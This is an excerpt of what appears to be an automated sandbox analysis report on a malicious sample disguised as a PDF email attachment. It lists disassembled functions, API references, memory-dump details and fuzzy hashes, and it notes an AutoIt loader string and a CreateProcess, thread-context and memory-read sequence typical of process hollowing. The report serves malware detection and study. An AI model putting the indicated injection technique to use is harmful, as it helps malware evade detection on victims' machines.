                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$CloseCreateHandleTime
                                                                                                          • String ID:
                                                                                                          • API String ID: 3397143404-0
                                                                                                          • Opcode ID: d09704b7b4620657d6702d4d7288206e880809aa1bb2633dc88b7c8b82db4aa9
                                                                                                          • Instruction ID: 0357bc8e683137d469c2af57890d0227d39b5ae7acecc5ced28ecc6d75a61d4d
                                                                                                          • Opcode Fuzzy Hash: d09704b7b4620657d6702d4d7288206e880809aa1bb2633dc88b7c8b82db4aa9
                                                                                                          • Instruction Fuzzy Hash: 56E08632141228B7D7211B54EC09FCA7F29AF06760F148121FB25690E087B61611979C
                                                                                                          Function 007B8D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _free.LIBCMT ref: 007B8D1B
                                                                                                            • Part of subcall function 00772D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00779A24), ref: 00772D69
                                                                                                            • Part of subcall function 00772D55: GetLastError.KERNEL32(00000000,?,00779A24), ref: 00772D7B
                                                                                                          • _free.LIBCMT ref: 007B8D2C
                                                                                                          • _free.LIBCMT ref: 007B8D3E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 776569668-0
                                                                                                          • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                          • Instruction ID: c4831ac2bfae1f57e1ef63a50a24b752b2c47bfd3d36a32ab715a05e46f06152
                                                                                                          • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                          • Instruction Fuzzy Hash: A0E012A170160186CF74A579A944BD313DC4F5C392718491EB41DD7187CE6CF843C124
                                                                                                          Function 0075A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: CALL
                                                                                                          • API String ID: 0-4196123274
                                                                                                          • Opcode ID: 82666099f70c0560f1adff194d520f2599b169de79a8f78627cce2f4d46272fb
                                                                                                          • Instruction ID: dc8db130ec1ca5e1848a9615ca12d5c33d126b7f90d0d1b23d1cfd6b5cdac3ba
                                                                                                          • Opcode Fuzzy Hash: 82666099f70c0560f1adff194d520f2599b169de79a8f78627cce2f4d46272fb
                                                                                                          • Instruction Fuzzy Hash: FB226E70608301DFDB24DF14C454AAAB7E1FF44305F15896DE88A8B361D7B9ED49CB92
                                                                                                          Function 00754DDD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64libraryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00754BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00754BEF
                                                                                                            • Part of subcall function 0077525B: __wfsopen.LIBCMT ref: 00775266
                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754E0F
                                                                                                            • Part of subcall function 00754B6A: FreeLibrary.KERNEL32(00000000), ref: 00754BA4
                                                                                                            • Part of subcall function 00754C70: _memmove.LIBCMT ref: 00754CBA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 1396898556-2740779761
                                                                                                          • Opcode ID: 4d0a8e9288e26beb0084ab9584e69c81f4d46d29ba4e13117188aafde232995a
                                                                                                          • Instruction ID: a45d84121cc71bcfb559dc8a37a45257bea3cf09e2b67ec0e45b6a8a5ca7dd34
                                                                                                          • Opcode Fuzzy Hash: 4d0a8e9288e26beb0084ab9584e69c81f4d46d29ba4e13117188aafde232995a
                                                                                                          • Instruction Fuzzy Hash: 2811C471600205EBCF24BF74C81BFED77A4AF44715F108429F942A7181DAB99E489B50
                                                                                                          Function 00757A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 4104443479-0
                                                                                                          • Opcode ID: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
                                                                                                          • Instruction ID: 7d0dd621627d375c2bc84c902952290cb9a060204ac7d54d09e654d796f9c6f0
                                                                                                          • Opcode Fuzzy Hash: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
                                                                                                          • Instruction Fuzzy Hash: 1531A4B1604606EFC718DF68D8D1DA9B3A9FF48310715C629F919CB391EB78E914CB90
                                                                                                          Function 00770DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 0077571C: __FF_MSGBANNER.LIBCMT ref: 00775733
                                                                                                            • Part of subcall function 0077571C: __NMSG_WRITE.LIBCMT ref: 0077573A
                                                                                                            • Part of subcall function 0077571C: RtlAllocateHeap.NTDLL(00E40000,00000000,00000001,00000000,?,?,?,00770DD3,?), ref: 0077575F
                                                                                                          • std::exception::exception.LIBCMT ref: 00770DEC
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00770E01
                                                                                                            • Part of subcall function 0077859B: RaiseException.KERNEL32(?,?,?,00809E78,00000000,?,?,?,?,00770E06,?,00809E78,?,00000001), ref: 007785F0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                          • String ID:
                                                                                                          • API String ID: 3902256705-0
                                                                                                          • Opcode ID: 9ccad867af6eab42ae695519099a7d5167e35f4e8459ed278369a112bc9f14de
                                                                                                          • Instruction ID: 71e57ed701375c573fee95f34552b0ae184a8d9bfed683ee27f1b97aadb1f276
                                                                                                          • Opcode Fuzzy Hash: 9ccad867af6eab42ae695519099a7d5167e35f4e8459ed278369a112bc9f14de
                                                                                                          • Instruction Fuzzy Hash: 75F0A93164031DE6CF20FBA9DC099DF77AC9F05391F108429F91C96182DFF89A5191D1
                                                                                                          Function 007755FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __lock_file_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 26237723-0
                                                                                                          • Opcode ID: a71b95d9cd138810cb5a50b4b8b6d311a38fcffa94e121896ebf330cb8db15b1
                                                                                                          • Instruction ID: fd57c7026a209f607e1314d751bad5bdb60fc628cb8700e088fad6e7e809c216
                                                                                                          • Opcode Fuzzy Hash: a71b95d9cd138810cb5a50b4b8b6d311a38fcffa94e121896ebf330cb8db15b1
                                                                                                          • Instruction Fuzzy Hash: BC01F7B1C00A08EBCF62AF64CC0A49E7B61EF517E1F54C115F82C9A191DB7D8A11DF92
                                                                                                          Function 007753A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00778B28: __getptd_noexit.LIBCMT ref: 00778B28
                                                                                                          • __lock_file.LIBCMT ref: 007753EB
                                                                                                            • Part of subcall function 00776C11: __lock.LIBCMT ref: 00776C34
                                                                                                          • __fclose_nolock.LIBCMT ref: 007753F6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 2800547568-0
                                                                                                          • Opcode ID: fac6ed734ebb32e7969bb18766fc0ccae70f020a7f7b2eaf83a7adc4ccd89583
                                                                                                          • Instruction ID: 0b2c248b14e9f8783675d019c4f60f56686455598d31a363364a6fccbc59597c
                                                                                                          • Opcode Fuzzy Hash: fac6ed734ebb32e7969bb18766fc0ccae70f020a7f7b2eaf83a7adc4ccd89583
                                                                                                          • Instruction Fuzzy Hash: 13F09071900B04DADF61AB65D80E7AE7AA06F413F8F24C208A42CAB1D1CFFC99419F52
                                                                                                          Function 00E830ED Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 00E8391D
                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E83941
                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E83963
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101778828.0000000000E81000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_e81000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 2438371351-0
                                                                                                          • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                          • Instruction ID: cdad46ce28c58c79c5b0fd129ac1db2ca97e278d455de81b2c0f4c84062014b1
                                                                                                          • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                          • Instruction Fuzzy Hash: B812CF24E14658C6EB24DF64D8507DEB232EF68700F10A0E9910DEB7A5E77A4F81CF5A
                                                                                                          Function 0075F290 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 18415a56a0777a5913ad73f402c19e9c00d5eed85c3f7de29c4478945130d109
                                                                                                          • Instruction ID: e0ae2cddf1c4d68f3108ca8ea870a1f645df6758f55c9c76dc322b2ccabfaaa1
                                                                                                          • Opcode Fuzzy Hash: 18415a56a0777a5913ad73f402c19e9c00d5eed85c3f7de29c4478945130d109
                                                                                                          • Instruction Fuzzy Hash: 21619D7060024ADFDB20EF64C885AAAB7F5EF44305F14847DED0697291D7B9ED49CB90
                                                                                                          Function 00770C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                          • Instruction ID: 92a90b116c1509bd1db449f2d13dc3774e1b4d3acf5a35fa62cd4dcde5d834aa
                                                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                          • Instruction Fuzzy Hash: B331A270A00105DBCB1ADF58C484AA9FBA6FB59380B64C6A5E80ACB355D635EDC1DBE0
                                                                                                          Function 0078FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClearVariant
                                                                                                          • String ID:
                                                                                                          • API String ID: 1473721057-0
                                                                                                          • Opcode ID: df381b633be8cda52a2649aa68fe8b61bdaa7b7d89c9988e4472a81e6ec57a6c
                                                                                                          • Instruction ID: 9e7b0ae91c54fc03845266f30514e24160297e14af9aa8e4fe5c98b826fd43b5
                                                                                                          • Opcode Fuzzy Hash: df381b633be8cda52a2649aa68fe8b61bdaa7b7d89c9988e4472a81e6ec57a6c
                                                                                                          • Instruction Fuzzy Hash: 16412B74604341DFDB14DF24C448B5ABBE0BF49315F0989ACE99A8B362C779E849CF52
                                                                                                          Function 00757B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 4104443479-0
                                                                                                          • Opcode ID: 92ca21916ad050ff510af859d9a1f3720c5d431556feb57b4de9c694ca1ed3fe
                                                                                                          • Instruction ID: 479efd9af2439c203394b2de0226f7b174ee09fd74bc5bea744c166c918b3dda
                                                                                                          • Opcode Fuzzy Hash: 92ca21916ad050ff510af859d9a1f3720c5d431556feb57b4de9c694ca1ed3fe
                                                                                                          • Instruction Fuzzy Hash: 93219AB2A04A09EBDF14AF21FC417AA7BB4FF14351F20842DE886C5091EBB485D0D755
                                                                                                          Function 0078FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClearVariant
                                                                                                          • String ID:
                                                                                                          • API String ID: 1473721057-0
                                                                                                          • Opcode ID: cb45412cf5f9b44c5156603ad0f69eb7079ca20f07e4ab8b6213aea07bd5c86e
                                                                                                          • Instruction ID: caa01691246514a42a88287b3ec708b9a1249af6fa40184f7f1f388760188410
                                                                                                          • Opcode Fuzzy Hash: cb45412cf5f9b44c5156603ad0f69eb7079ca20f07e4ab8b6213aea07bd5c86e
                                                                                                          • Instruction Fuzzy Hash: 2D2124B4608341DFCB14EF24C444A5ABBF1BF88315F05896CF98A57722D779E849CB92
                                                                                                          Function 0077072A Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9f3da643087374d493adc1811755abba64b54cb0ac9a65eb38940e5a54b7e8fd
                                                                                                          • Instruction ID: 96f58b31e919e5c1a1ceb4b9b36e42a1bf97583d6756e2589a566a3b9af13a63
                                                                                                          • Opcode Fuzzy Hash: 9f3da643087374d493adc1811755abba64b54cb0ac9a65eb38940e5a54b7e8fd
                                                                                                          • Instruction Fuzzy Hash: 0701F533505141DFEF295A28AC46AEEF3E8EF803E1B24C06FFD9C96910D6686C448AD1
                                                                                                          Function 00774863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __lock_file.LIBCMT ref: 007748A6
                                                                                                            • Part of subcall function 00778B28: __getptd_noexit.LIBCMT ref: 00778B28
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __getptd_noexit__lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 2597487223-0
                                                                                                          • Opcode ID: 29d44bb7154f4bee986f30d333f32ae04b8a267310a0827db5cbc59119df312d
                                                                                                          • Instruction ID: a91ff8a61890e4725f02ed878167bfcc22a9ea19ad166acdd3be8d6a4891a730
                                                                                                          • Opcode Fuzzy Hash: 29d44bb7154f4bee986f30d333f32ae04b8a267310a0827db5cbc59119df312d
                                                                                                          • Instruction Fuzzy Hash: E7F0FF71900609EBDF51AFA0CC0E3AE36A0AF003A0F05C404F42C9A191CB7C8950DF53
                                                                                                          Function 00754E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FreeLibrary.KERNEL32(?,?,,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754E7E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary
                                                                                                          • String ID:
                                                                                                          • API String ID: 3664257935-0
                                                                                                          • Opcode ID: 73751c179ba5b5b290a6f5318cb11792b32cec082316e406a6f612251e4dac97
                                                                                                          • Instruction ID: ebd5ab8591b37384590ea2eb2b44797337798daa1e3c98e24fadaaf00d3ca904
                                                                                                          • Opcode Fuzzy Hash: 73751c179ba5b5b290a6f5318cb11792b32cec082316e406a6f612251e4dac97
                                                                                                          • Instruction Fuzzy Hash: 27F03971501751DFCB349F64E495896BBF1BF1436E3208A3EE9DB82620C7BA9888DF40
